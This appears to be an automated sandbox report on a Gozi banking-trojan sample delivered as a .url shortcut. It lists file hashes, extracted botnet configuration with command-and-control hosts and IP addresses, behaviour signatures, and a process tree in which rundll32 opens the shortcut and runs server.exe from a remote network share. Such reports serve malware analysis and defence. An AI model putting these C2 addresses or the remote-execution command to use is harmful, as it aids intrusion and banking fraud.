Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-03-2023 08:15

General

  • Target

    Agenzia/Agenzia.txt.url

  • Size

    195B

  • MD5

    cc689d7d4fa6905ebc5958630848fa00

  • SHA1

    3d0ca3eeb7a45d2367b0693188ba99cf68f6a520

  • SHA256

    67f14cb9d372a7a295a96a82f2eab679b7373f3613df6b8dcf9434482047caa1

  • SHA512

    974c9c969029636eb6db168cc65ddaed096b2695815107f8f0c14da0ab419c7ac25c76a8f16eeaad03102efcd918991f11e7a9685a1fb94a851280349862efdd

Malware Config

Extracted

Family

gozi

Botnet

7713

C2

checklist.skype.com

62.173.142.51

94.103.183.153

193.233.175.111

109.248.11.145

31.41.44.106

191.96.251.201

Attributes
  • base_path

    /drew/

  • build

    250255

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Agenzia\Agenzia.txt.url
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1392
    • \??\UNC\109.248.11.162\Agenzia\server.exe
      "\\109.248.11.162\Agenzia\server.exe"
      2⤵
        PID:1884

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1884-134-0x0000000000640000-0x000000000064B000-memory.dmp
      Filesize

      44KB

    • memory/1884-135-0x0000000000660000-0x000000000066D000-memory.dmp
      Filesize

      52KB

    • memory/1884-138-0x0000000000400000-0x00000000004B9000-memory.dmp
      Filesize

      740KB